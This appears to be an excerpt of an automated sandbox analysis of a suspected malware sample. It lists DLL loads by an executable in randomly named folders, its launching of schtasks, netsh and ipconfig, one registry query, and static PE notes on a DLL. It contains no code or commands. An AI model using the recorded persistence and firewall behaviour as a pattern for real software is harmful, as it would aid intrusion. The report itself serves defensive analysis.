Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winmm.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: devobj.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msasn1.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_is2022.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_g18030.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_gsm7.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_iscii.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netutils.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: olepro32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msimg32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: kernel.appcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windows.storage.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wldp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: shfolder.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: iphlpapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: magnification.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: d3d9.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: security.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: secur32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sspicli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: colorui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mscms.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coloradapterclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: compstui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: inetres.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: textshaping.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windowscodecs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: propsys.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: profapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wkscli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: cscapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winsta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: fwpuclnt.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: idndl.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mlang.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: textinputframework.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coreuicomponents.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: ntmarta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: edputil.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: urlmon.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: iertutil.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: srvcli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: appresolver.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: bcp47langs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: slc.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sppc.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wbemcomn.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sxs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: napinsp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: pnrpnsp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wshbth.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: nlaapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mswsock.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winrnr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: rasadhlp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: amsi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: d3d10warp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dxcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dcomp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: apphelp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: version.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mpr.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wininet.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wsock32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winmm.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: uxtheme.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: devobj.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: msasn1.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_is2022.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_g18030.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_gsm7.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: c_iscii.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: netapi32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: netutils.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: olepro32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: msimg32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: kernel.appcore.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: windows.storage.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wldp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: unrar.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: 7zxa.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winhttp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: shfolder.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: iphlpapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: magnification.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wtsapi32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: d3d9.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: security.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: secur32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: sspicli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: colorui.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mscms.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coloradapterclient.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: compstui.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: inetres.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: textshaping.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: windowscodecs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: propsys.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: profapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wkscli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: cscapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winsta.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: fwpuclnt.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: idndl.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mlang.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: edputil.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: urlmon.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: iertutil.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: srvcli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: textinputframework.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coreuicomponents.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: ntmarta.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: coremessaging.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: appresolver.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: bcp47langs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: slc.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: sppc.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wbemcomn.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: sxs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: napinsp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: pnrpnsp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: wshbth.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: nlaapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: mswsock.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dnsapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: winrnr.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: rasadhlp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: amsi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: d3d10warp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dxcore.dll
Source: C:\pnVcakKiqh\ybtrrus.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: version.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mpr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winmm.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: devobj.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msasn1.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_is2022.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_g18030.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_gsm7.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: c_iscii.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: netutils.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: olepro32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: msimg32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: kernel.appcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windows.storage.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wldp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: shfolder.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: iphlpapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: magnification.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: d3d9.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: security.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: secur32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: sspicli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: colorui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: mscms.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: coloradapterclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: compstui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: inetres.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: textshaping.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: windowscodecs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: propsys.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: profapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: wkscli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: cscapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: winsta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: fwpuclnt.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe	Section loaded: idndl.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\iDQiPwFWUp\ybtrrus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: T8TY28UxiT.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: T8TY28UxiT.dll

Static file information: File size 2714112 > 1048576

Source: T8TY28UxiT.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cc000

Source: T8TY28UxiT.dll

